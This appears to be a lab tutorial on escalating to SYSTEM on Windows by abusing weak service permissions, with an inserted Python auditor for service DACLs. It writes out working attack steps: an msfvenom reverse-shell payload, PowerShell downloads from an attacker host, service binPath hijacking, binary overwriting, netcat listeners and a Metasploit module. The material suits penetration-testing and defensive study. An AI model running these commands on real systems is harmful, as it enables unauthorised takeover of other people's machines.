
Windows Privilege Escalation: Weak Services Permission

vanta

Microsoft Windows offers a wide range of fine-grained permissions and privileges for controlling access to Windows components including services, files, and registry entries. Exploiting misconfigured services is one technique to increase privileges.



Table of Contents
  • MS Windows Services
  • Access Rights for the Service Control Manager
  • Weak Service Permission Lab Setup
  • Abusing Insecure Configuration File Permissions (PTOC)
  • Abusing Insecure Service Executable (PTO)
  • Metasploit

MS Windows Services

Microsoft Windows services, formerly known as NT services, enable you to create long-running executable applications that run in their own Windows sessions. These services can be automatically started when the computer boots, can be paused and restarted, and do not show any user interface. For each service, a registry key exists in HKLM\SYSTEM\CurrentControlSet\Services.

A system or a user account must be linked to a service for it to function properly. The following built-in system accounts are frequently used to operate services:

  • LocalService
  • NetworkService
  • LocalSystem

Access Rights for the Service Control Manager

The Service Control Manager (SCM) creates a service object’s security descriptor when the service is installed by the CreateService function. The default security descriptor of a service object grants the access documented in the Microsoft reference on service security and access rights linked at the end of this post.



Weak Service Permission Lab Setup

This article walks through setting up a lab for two Windows weak service permission misconfigurations that allow an attacker to obtain administrative privileges:

  • Insecure Configuration File Permissions: A low-privileged user can update service settings, such as the service binary that runs when the service starts.
  • Insecure Service Executable: When the service starts, a low-privileged user can overwrite the binary it launches.



Each service has an Access Control List (ACL) that defines who may query, start, stop or reconfigure it. Granted to the wrong principal, the operations behind the following commands are extremely damaging:

  • sc qc <service> – query the configuration of the service
  • sc query <service> – check the current status of the service
  • net start/stop <service> – start and stop the service
  • sc config <service> <option>= <value> – change the configuration of the service

Steps for Weak Services Permissions

Step 1: Run CMD as administrator and execute the command below to create a service named pentest whose binary lives in the C:\temp directory.

Code:
sc.exe create pentest binPath= "C:\temp\service.exe"



Step 2: To make the service vulnerable we assign it some toxic permissions, using SubInACL to change the service’s ACL.

NOTE: SubInACL is a little-known command-line tool from Microsoft, yet it is one of the best tools for working with security permissions in Windows. It can change the permissions of files, folders, registry keys, services, printers, cluster shares and various other types of objects.

In this case we grant a user permission to pause/continue, start and stop the service and to change its configuration (the PTOC flags used in the next step). The full list of available service permissions is given in the tool’s help output.




Step 3: After downloading SubInACL, execute the following commands to assign PTOC permissions to the user “ignite” on the “pentest” service.

Code:
cd C:\Program Files (x86)\Windows Resource Kits\Tools
subinacl.exe /service pentest /grant=msedgewin10\ignite=PTOC



Abusing Insecure Configuration File Permissions (PTOC)

An attacker can escalate privileges through the service configuration if a low-privileged user holds the SERVICE_ALL_ACCESS or SERVICE_CHANGE_CONFIG permission on the service.

Following an initial foothold, you can use the wmic utility to enumerate system services and query each service’s name, start name (account) and binary path.

Code:
wmic service get name,startname,pathname



The output lists the service named pentest with its binary in the C:\temp directory. We can verify the service configuration with the following command.

Code:
sc qc pentest

According to the output, the service runs as LocalSystem and has privileges to start, stop and pause services.



We can identify SERVICE_ALL_ACCESS or SERVICE_CHANGE_CONFIG permissions using the Sysinternals accesschk tool, since these rights allow an attacker to change service settings.

Code:
accesschk.exe /accepteula -uwcqv ignite pentest

The output shows that the ignite user has full access to this service.
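As an added, defender-side example (not part of the original post or of any tool it uses), the following Python audits a service DACL taken from the SDDL that `sc sdshow <service>` prints, flagging ACEs that give SERVICE_CHANGE_CONFIG, WRITE_DAC or WRITE_OWNER to any principal other than SYSTEM and Administrators. The right abbreviations are the standard SDDL ones for service objects; SAMPLE_WEAK is a constructed string, not output from a real host, and file-level write access to the service binary is a separate check this block does not cover.

```python
"""Audit a Windows service DACL (SDDL from `sc sdshow <service>`) for hijackable ACEs."""
import re

RIGHTS = {  # SDDL abbreviation -> (access-mask bit, Win32 right name) for service objects
    "CC": (0x1, "SERVICE_QUERY_CONFIG"),      "DC": (0x2, "SERVICE_CHANGE_CONFIG"),
    "LC": (0x4, "SERVICE_QUERY_STATUS"),      "SW": (0x8, "SERVICE_ENUMERATE_DEPENDENTS"),
    "RP": (0x10, "SERVICE_START"),            "WP": (0x20, "SERVICE_STOP"),
    "DT": (0x40, "SERVICE_PAUSE_CONTINUE"),   "LO": (0x80, "SERVICE_INTERROGATE"),
    "CR": (0x100, "SERVICE_USER_DEFINED_CONTROL"), "SD": (0x10000, "DELETE"),
    "RC": (0x20000, "READ_CONTROL"),          "WD": (0x40000, "WRITE_DAC"),
    "WO": (0x80000, "WRITE_OWNER"),           "GA": (0x10000000, "GENERIC_ALL"),
    "GX": (0x20000000, "GENERIC_EXECUTE"),    "GW": (0x40000000, "GENERIC_WRITE"),
    "GR": (0x80000000, "GENERIC_READ"),
}
# Rights that let the holder change what the service runs, or rewrite its ACL.
HIJACK = {"SERVICE_CHANGE_CONFIG", "WRITE_DAC", "WRITE_OWNER", "GENERIC_ALL", "GENERIC_WRITE"}
TRUSTED = {"SY", "BA", "LA", "S-1-5-18", "S-1-5-32-544"}  # full access is expected here
BROAD = {"WD": "Everyone", "AU": "Authenticated Users", "IU": "Interactive Users",  # low-priv
         "BU": "Users", "DU": "Domain Users", "BG": "Guests", "AN": "Anonymous"}
# Constructed sample (not from a real host): default-style DACL plus an ACE giving one user DC.
SAMPLE_WEAK = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
               "(A;;DCRPWPDT;;;S-1-5-21-1111-2222-3333-1001)(A;;CCLCSWLOCRRC;;;IU)")

def rights_from_field(field):
    """Decode an ACE rights field: a hex mask or concatenated two-letter abbreviations."""
    if field.lower().startswith("0x"):
        mask = int(field, 16)
    else:
        mask = 0
        for i in range(0, len(field), 2):
            mask |= RIGHTS.get(field[i:i + 2], (0, ""))[0]
    return {name for bit, name in RIGHTS.values() if mask & bit}

def parse_dacl(sddl):
    """Return [(sid, rights)] for every access-allowed ACE in the D: part of the SDDL."""
    dacl = sddl.split("D:", 1)[1].split("S:", 1)[0] if "D:" in sddl else ""
    aces = []
    for body in re.findall(r"\(([^)]*)\)", dacl):
        parts = body.split(";")          # type;flags;rights;object;inherit;sid
        if parts[0] == "A":              # deny ACEs never add access
            aces.append((parts[5], rights_from_field(parts[2])))
    return aces

def weak_aces(sddl):
    """List (principal, hijack rights) for non-trusted ACEs; empty means the DACL is sound."""
    findings = []
    for sid, rights in parse_dacl(sddl):
        risky = sorted(rights & HIJACK)
        if sid not in TRUSTED and risky:
            findings.append((BROAD.get(sid, sid), risky))
    return findings
```

Run `weak_aces()` over the output of `sc sdshow pentest` after the lab setup above to see the granted change-configuration right reported; an empty list for every service is the state an administrator wants.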



Since the user ignite has full access to the service and can therefore change its configuration, create an executable payload, transfer it to the victim’s machine, and point the service binary path at it.

Code:
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=8888 -f exe > shell.exe
python -m SimpleHTTPServer 80



Use the following commands to transfer shell.exe into C:\Users\Public on the target (the path the service will be pointed at), and start a new Netcat listener on the Kali Linux machine.

Code:
cd c:\Users\public
powershell wget http://192.168.1.3/shell.exe -OutFile shell.exe
dir



Because the ignite user can edit the service configuration and then start the service, we can change the binary path to point at our reverse shell payload.

Code:
sc config pentest binPath= "C:\Users\Public\shell.exe"
net start pentest



As soon as the service starts, the attacker receives a reverse connection in the new Netcat session as NT AUTHORITY\SYSTEM.

Code:
nc -lvp 8888
whoami



Abusing Insecure Service Executable (PTO)

If the low-privileged user has at least Pause/Continue, Start and Stop permissions on the service, an attacker may try to overwrite the service binary (which requires write access to it) with a malicious executable in order to escalate privileges.

Code:
cd c:\temp
dir
move service.exe service.bak



Use the following command to transfer the malicious shell.exe into C:\temp under the original binary’s name, and start a new Netcat listener on the Kali Linux machine.

Code:
powershell wget http://192.168.1.3/shell.exe -OutFile service.exe

As soon as the service starts, the attacker receives a reverse connection in the new Netcat session as NT AUTHORITY\SYSTEM.



Code:
nc -lvp 8888
whoami



Metasploit

This module attempts to exploit existing administrative privileges to obtain a SYSTEM session. If directly creating a service fails, this module will inspect existing services to look for insecure configuration, file or registry permissions that may be hijacked. It will then attempt to restart the replaced service to run the payload.

Code:
use exploit/windows/local/service_permissions
set lhost 192.168.1.3
set session 1
exploit



This will result in a new session as NT AUTHORITY\SYSTEM when this succeeds.

https://docs.microsoft.com/en-us/do.../introduction-to-windows-service-applications

https://docs.microsoft.com/en-us/windows/win32/services/service-security-and-access-rights

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets enthusiast.
 
